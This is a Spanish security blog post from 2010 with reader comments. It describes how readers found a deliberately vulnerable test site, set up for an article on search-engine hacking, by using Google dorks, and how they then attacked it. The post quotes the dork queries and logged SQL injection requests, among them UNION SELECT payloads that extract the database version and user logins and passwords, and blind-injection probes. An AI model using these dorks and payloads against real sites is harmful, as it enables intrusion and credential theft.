lunes, abril 05, 2010

Auditorías web for free

Desde hace tiempo tengo la sensación, algunas veces más que contrastada, de que poner un link en este blog es como pedir una auditoría web gratuita para ese sitio. Basta con poner el link de una web de lo que sea para que alguien (o algunos) le pasen un escaneo completo al sitio para encontar los RFI, los XSS, los SQLi, los Blind, los fallos, los robots.txt. Esto ya me pasó con un par de webs en las que me tocó ayudarles a corregir los problemas que tenían entonces porque me sentía responsable.

La verdad es que yo también soy de los que se me caen las cosas sobre el teclado para introducir cosas cualquier parámetro con cara de sospechoso...

El caso es que, sabiendo este comportamiento, hace tiempo que intento salvaguardar algunos sitios, pero ciertas veces no lo consigo del todo. Y este es el caso del artículo de "Buscadores como arma de destrucción masiva" que estamos escribiendo Enrique Rando y yo. Para ello Enrique se ha creado, en un hosting gratuito, una web sintética que simula ser vulnerable a LFI y SQLi, para indexarla y hacerla perrerías.

Como no queríamos que nadie enredara, en lugar de avisar que es sintética, lo que hicimos fue intentar borrar la URL, pero... dio igual, porque al poco de estar publicado el post empezó a haber mucho tráfico en esa web. Tráfico que venía de los buscadores, donde alguno de vostros había hecho Google Hacking buscando la info que se ve en las imágenes:

jospeh almond rudy asfghjk
units - "the complementary page"
"Units - The complementary Page"
units converter.php almond rudy
units "the complementary page"
inurl:converter.php?id=0+union+select
inurl:converter.php?id=0+union
intitle:"Units - The complementary"
intitle:Units - The complementary Page


Y, por supuesto, una vez encontrada la URL... ¡a la carga!

/converter.php?id=0+union+select+database(),+p+from+us
/converter.php?id=0+union+select+version(),+p+from+us
/converter.php?id=0+union+select+group_concat%20version%20%20%20%2C+p+from+us
/converter.php?id=0%20union%20select%20login,password%20from%20tabla_usuarios%20--
/converter.php?id=0%20union%20select%20n,%20p%20from%20pa'%20AND%20NVL(ASCII(SUBSTR((SELECT%201%20FROM%20DUAL),1,1)),0)%3E255--&plx=1
/converter.php?id=0%20union%20select%20n,%20p%20from%20pa/**/AND/**/ISNULL(ASCII(SUBSTRING(CAST((SELECT/**/@@version)AS/**/varchar(8000)),1,1)),0)%3C255&plx=1
/converter.php?id=0'))%20AND%20NVL(ASCII(SUBSTR((SELECT%201%20FROM%20DUAL),1,1)),0)%3E255
/converter.php?id=0+union+select+version(),n,+p+from+us&plx=1
/archive.php?id=2%27


Curiosamente, el tráfico que se generó a partir de los buscadores ese día, hizo que la relevancia de la web subiera lo suficiente ese día como para ser el quinto resultado con el título de la web


La pagina complementaria

En fin, que la próxima vez que vaya a hacer una auditoría a una web, antes la paso por aquí para que la déis un repasito vosotros antes. }:P

Saludos Malignos!

PD: ¿Te pongo un link a tu web?

7 comentarios:

WiNSoCk dijo...

Quizá, y sólo quizá, tengo un teclado un poco viejo, es decir, si presiono una tecla, como mucho, sale dicha tecla, a excepción de las superiores, que me permiten abrir la cálculadora, el correo...

Ahora bien, ¿Como co**, es posible que alguno tenga la mala suerte de tener en una de esas teclas una macro con el siguiente código: /converter.php?id=0+union+select+database(),+p+from+us ?

un saludo,
WiNSoCk.

Anónimo dijo...

Hombre, pues ya puestos, tengo por aquí yo una página que... XD

Anónimo dijo...

Winsock, ni imaginas las querys que se pueden llegar a escribir cuando se te cae la taza de café encima del teclado

/ts

Seifreed dijo...

Increíble xD
Espero que no auditen demasiado xD

Un saludo

agux dijo...

Antes de poner el enlace por aquí se lo paso a los compas del FTSAI, que llevan ni se sabe pidiéndome que se se lo diera.

Para mi desgracia, hace una semana subí al hosting, a "prepro" lo que tenía hecho... Y no es que se rompiera por todos lados, peeero como que algunas cosas no hacían lo mismo que en la parte de desarollo. :(

En cuanto consiga que haga lo que esperaba que hiciera... aviso.

Sadi78 dijo...

Es viejo, pero no por ello deja de ser bueno:

http://www.phibbi.com/wp-content/uploads/2009/07/exploits_of_a_mom.png

Anónimo dijo...

Don Chema :))

Ahí le va un link, gracias;) websolutions.click
Si no existiensen !Hackers, habría que inventarlos.

Entrada destacada

10 maneras de sacarle el jugo a tu cuenta de @MyPublicInbox si eres un Perfil Público

Cuando doy una charla a algún amigo, conocido, o a un grupo de personas que quieren conocer MyPublicInbox , siempre se acaban sorprendiendo ...

Entradas populares